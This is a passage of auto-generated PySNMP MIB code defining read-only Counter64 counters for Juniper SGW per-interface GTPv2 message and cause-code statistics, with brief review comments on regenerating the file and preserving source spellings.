if mibBuilder.loadTexts: jnxMbgSgwIfDlDataAckTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataAckTx.setDescription('Number of GTP V2 Downlink Data Notify Acknowledgement Sent.')
jnxMbgSgwIfDlDataNotiFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 85), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataNotiFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataNotiFlrIndRx.setDescription('Number of GTP V2 Downlink Data Notification fail received.')
jnxMbgSgwIfDlDataNotiFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 86), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataNotiFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataNotiFlrIndTx.setDescription('Number of GTP V2 Downlink Data Notification fail Sent.')
jnxMbgSgwIfStopPagingIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 87), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfStopPagingIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfStopPagingIndRx.setDescription('Number of GTP V2 Number of Stop Paging Indication Messages Received.')
jnxMbgSgwIfStopPagingIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 88), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfStopPagingIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfStopPagingIndTx.setDescription('Number of GTP V2 Number of Stop Paging Indicaton messages sent')
jnxMbgSgwIfGtpV2ICsReqAcceptRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 89), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsReqAcceptRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsReqAcceptRx.setDescription('Number of GTPV2 packets received with cause Request Accept.')
jnxMbgSgwIfGtpV2ICsReqAcceptTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 90), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsReqAcceptTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsReqAcceptTx.setDescription('Number of GTP packets sent with cause Request Accept.')
jnxMbgSgwIfGtpV2ICsAcceptPartRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 91), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAcceptPartRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAcceptPartRx.setDescription('Number of GTPV2 packets received with cause Accept Partial.')
jnxMbgSgwIfGtpV2ICsAcceptPartTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 92), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAcceptPartTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAcceptPartTx.setDescription('Number of GTP packets sent with cause Accept Partial.')
jnxMbgSgwIfGtpV2ICsNewPTNPrefRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 93), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNewPTNPrefRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNewPTNPrefRx.setDescription('Number of GTPV2 packets received with cause New PDN type due to Network Preference.')
jnxMbgSgwIfGtpV2ICsNewPTNPrefTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 94), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNewPTNPrefTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNewPTNPrefTx.setDescription('Number of GTP packets sent with cause New PDN type due to Network Preference')
jnxMbgSgwIfGtpV2ICsNPTSIAdbrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 95), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNPTSIAdbrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNPTSIAdbrRx.setDescription('Number of GTPV2 packets received with cause New PDN type due to Single Address Bearer.')
jnxMbgSgwIfGtpV2ICsNPTSIAdbrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 96), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNPTSIAdbrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNPTSIAdbrTx.setDescription('Number of GTP packets sent with cause New PDN type due to Single Address Bearer.')
jnxMbgSgwIfGtpV2ICsCtxNotFndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 97), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCtxNotFndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCtxNotFndRx.setDescription('Number of GTPV2 packets received with cause Context not found.')
jnxMbgSgwIfGtpV2ICsCtxNotFndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 98), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCtxNotFndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCtxNotFndTx.setDescription('Number of GTP packets sent with cause Context not found.')
jnxMbgSgwIfGtpV2ICsInvMsgFmtRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 99), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvMsgFmtRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvMsgFmtRx.setDescription('Number of GTPV2 packets received with cause Invalid Message Format.')
jnxMbgSgwIfGtpV2ICsInvMsgFmtTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 100), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvMsgFmtTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvMsgFmtTx.setDescription('Number of GTP packets sent with cause Invalid Message Format.')
jnxMbgSgwIfGtpV2ICsVerNotSuppRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 101), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsVerNotSuppRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsVerNotSuppRx.setDescription('Number of GTPV2 packets received with cause Version not Supported.')
jnxMbgSgwIfGtpV2ICsVerNotSuppTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 102), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsVerNotSuppTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsVerNotSuppTx.setDescription('Number of GTP packets sent with cause Version not Supported.')
jnxMbgSgwIfGtpV2ICsInvLenRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 103), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvLenRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvLenRx.setDescription('Number of GTPV2 packets received with cause Invalid Length.')
jnxMbgSgwIfGtpV2ICsInvLenTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 104), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvLenTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvLenTx.setDescription('Number of GTP packets sent with cause Invalid Length.')
jnxMbgSgwIfGtpV2ICsSrvNotSuppRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 105), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSrvNotSuppRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSrvNotSuppRx.setDescription('Number of GTPV2 packets received with cause Service Not supported.')
jnxMbgSgwIfGtpV2ICsSrvNotSuppTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 106), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSrvNotSuppTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSrvNotSuppTx.setDescription('Number of GTP packets sent with cause Service Not supported.')
jnxMbgSgwIfGtpV2ICsManIEIncorRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 107), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsManIEIncorRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsManIEIncorRx.setDescription('Number of GTPV2 packets received with cause Mandatory IE incorrect.')
jnxMbgSgwIfGtpV2ICsManIEIncorTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 108), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsManIEIncorTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsManIEIncorTx.setDescription('Number of GTP packets sent with cause Mandatory IE incorrect.')
jnxMbgSgwIfGtpV2ICsManIEMissRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 109), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsManIEMissRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsManIEMissRx.setDescription('Number of GTPV2 packets received with cause Mandatory IE Missing.')
jnxMbgSgwIfGtpV2ICsManIEMissTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 110), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsManIEMissTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsManIEMissTx.setDescription('Number of GTP packets sent with cause Mandatory IE Missing.')
# --- Auto-generated PySNMP MIB objects (Juniper enterprise OID subtree
# 1.3.6.1.4.1.2636.3.66.2.2.1.4.1.<n>).  Each 3-line stanza below defines one
# read-only Counter64 table column for a per-interface GTP statistics table
# and, when textual info is loaded (mibBuilder.loadTexts), attaches its
# STATUS and DESCRIPTION strings.
# NOTE(review): this file looks like MIB-compiler output (e.g. pysnmp
# mibdump) — prefer regenerating from the source MIB over hand-editing
# these stanzas, since every description string must stay byte-identical
# to the MIB's DESCRIPTION clause.
#
# GTPv2 Initial-Context cause-code counters (Rx/Tx pairs), continued.
jnxMbgSgwIfGtpV2ICsOptIEIncorRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 111), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsOptIEIncorRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsOptIEIncorRx.setDescription('Number of GTPV2 packets received with cause Optional IE Incorrect.')
jnxMbgSgwIfGtpV2ICsOptIEIncorTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 112), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsOptIEIncorTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsOptIEIncorTx.setDescription('Number of GTP packets sent with cause Optional IE Incorrect.')
jnxMbgSgwIfGtpV2ICsSysFailRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 113), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSysFailRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSysFailRx.setDescription('Number of GTPV2 packets received with cause System Failure.')
jnxMbgSgwIfGtpV2ICsSysFailTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 114), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSysFailTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSysFailTx.setDescription('Number of GTP packets sent with cause System Failure.')
jnxMbgSgwIfGtpV2ICsNoResRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 115), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNoResRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNoResRx.setDescription('Number of GTPV2 packets received with cause No Resource.')
jnxMbgSgwIfGtpV2ICsNoResTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 116), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNoResTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNoResTx.setDescription('Number of GTP packets sent with cause No Resource.')
# NOTE(review): "Symantic" in the descriptions below reproduces the spelling
# in the source MIB's DESCRIPTION clause; do not "correct" it here or the
# runtime text diverges from the MIB.
jnxMbgSgwIfGtpV2ICsTFTSMANTErRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 117), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsTFTSMANTErRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsTFTSMANTErRx.setDescription('Number of GTPV2 packets received with cause TFT Symantic Error.')
jnxMbgSgwIfGtpV2ICsTFTSMANTErTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 118), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsTFTSMANTErTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsTFTSMANTErTx.setDescription('Number of GTP packets sent with cause TFT Symantic Error.')
jnxMbgSgwIfGtpV2ICsTFTSysErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 119), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsTFTSysErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsTFTSysErrRx.setDescription('Number of GTPV2 packets received with cause TFT System Error.')
jnxMbgSgwIfGtpV2ICsTFTSysErrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 120), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsTFTSysErrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsTFTSysErrTx.setDescription('Number of GTP packets sent with cause TFT System Error.')
jnxMbgSgwIfGtpV2ICsPkFltManErRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 121), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPkFltManErRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPkFltManErRx.setDescription('Number of GTPV2 packets received with cause Packet Filter Symantic Error.')
jnxMbgSgwIfGtpV2ICsPkFltManErTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 122), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPkFltManErTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPkFltManErTx.setDescription('Number of GTP packets sent with cause Packet Filter Symantic Error.')
jnxMbgSgwIfGtpV2ICsPkFltSynErRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 123), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPkFltSynErRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPkFltSynErRx.setDescription('Number of GTPV2 packets received with cause Packet Filter Syntax Error.')
jnxMbgSgwIfGtpV2ICsPkFltSynErTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 124), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPkFltSynErTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPkFltSynErTx.setDescription('Number of GTP packets sent with cause Packet Filter Syntax Error.')
jnxMbgSgwIfGtpV2ICsMisUnknAPNRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 125), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsMisUnknAPNRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsMisUnknAPNRx.setDescription('Number of GTPV2 packets received with cause Unknown APN.')
jnxMbgSgwIfGtpV2ICsMisUnknAPNTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 126), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsMisUnknAPNTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsMisUnknAPNTx.setDescription('Number of GTP packets sent with cause Unknown APN.')
jnxMbgSgwIfGtpV2ICsUnexpRptIERx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 127), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnexpRptIERx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnexpRptIERx.setDescription('Number of GTPV2 packets received with cause Unexpected Repeated IE.')
jnxMbgSgwIfGtpV2ICsUnexpRptIETx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 128), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnexpRptIETx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnexpRptIETx.setDescription('Number of GTP packets sent with cause Unexpected Repeated IE.')
jnxMbgSgwIfGtpV2ICsGREKeyNtFdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 129), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsGREKeyNtFdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsGREKeyNtFdRx.setDescription('Number of GTPV2 packets received with cause GRE Key Not Found.')
jnxMbgSgwIfGtpV2ICsGREKeyNtFdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 130), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsGREKeyNtFdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsGREKeyNtFdTx.setDescription('Number of GTP packets sent with cause GRE Key Not Found.')
jnxMbgSgwIfGtpV2ICsRelocFailRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 131), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRelocFailRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRelocFailRx.setDescription('Number of GTPV2 packets received with cause Relocation Failed.')
jnxMbgSgwIfGtpV2ICsRelocFailTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 132), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRelocFailTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRelocFailTx.setDescription('Number of GTP packets sent with cause Relocation Failed.')
jnxMbgSgwIfGtpV2ICsDenINRatRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 133), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsDenINRatRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsDenINRatRx.setDescription('Number of GTPV2 packets received with cause Denied in RAT.')
jnxMbgSgwIfGtpV2ICsDenINRatTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 134), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsDenINRatTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsDenINRatTx.setDescription('Number of GTP packets sent with cause Denied in RAT.')
jnxMbgSgwIfGtpV2ICsPTNotSuppRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 135), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPTNotSuppRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPTNotSuppRx.setDescription('Number of GTPV2 packets received with cause PDN Type Not Supported.')
jnxMbgSgwIfGtpV2ICsPTNotSuppTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 136), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPTNotSuppTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPTNotSuppTx.setDescription('Number of GTP packets sent with cause PDN Type Not Supported.')
jnxMbgSgwIfGtpV2ICsAlDynAdOccRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 137), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAlDynAdOccRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAlDynAdOccRx.setDescription('Number of GTPV2 packets received with cause Allocated Dynamic Address Occupied.')
jnxMbgSgwIfGtpV2ICsAlDynAdOccTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 138), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAlDynAdOccTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAlDynAdOccTx.setDescription('Number of GTP packets sent with cause Allocated Dynamic Address Occupied.')
jnxMbgSgwIfGtpV2ICsNOTFTUECTXRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 139), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNOTFTUECTXRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNOTFTUECTXRx.setDescription('Number of GTPV2 packets received with cause UE Context Without TFT Exists.')
jnxMbgSgwIfGtpV2ICsNOTFTUECTXTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 140), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNOTFTUECTXTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNOTFTUECTXTx.setDescription('Number of GTP packets sent with cause UE Context Without TFT Exists.')
jnxMbgSgwIfGtpV2ICsProtoNtSupRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 141), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsProtoNtSupRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsProtoNtSupRx.setDescription('Number of GTPV2 packets received with cause Protocol Not Supported.')
jnxMbgSgwIfGtpV2ICsProtoNtSupTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 142), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsProtoNtSupTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsProtoNtSupTx.setDescription('Number of GTP packets sent with cause Protocol Not Supported.')
jnxMbgSgwIfGtpV2ICsUENotRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 143), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUENotRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUENotRespRx.setDescription('Number of GTPV2 packets received with cause UE Not Responding.')
jnxMbgSgwIfGtpV2ICsUENotRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 144), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUENotRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUENotRespTx.setDescription('Number of GTP packets sent with cause UE Not Responding.')
jnxMbgSgwIfGtpV2ICsUERefusesRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 145), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUERefusesRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUERefusesRx.setDescription('Number of GTPV2 packets received with cause UE Refuses.')
jnxMbgSgwIfGtpV2ICsUERefusesTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 146), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUERefusesTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUERefusesTx.setDescription('Number of GTP packets sent with cause UE Refuses.')
jnxMbgSgwIfGtpV2ICsServDeniedRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 147), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsServDeniedRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsServDeniedRx.setDescription('Number of GTPV2 packets received with cause Service Denied.')
jnxMbgSgwIfGtpV2ICsServDeniedTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 148), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsServDeniedTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsServDeniedTx.setDescription('Number of GTP packets sent with cause Service Denied.')
jnxMbgSgwIfGtpV2ICsUnabPageUERx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 149), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnabPageUERx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnabPageUERx.setDescription('Number of GTPV2 packets received with cause Unable to Page UE.')
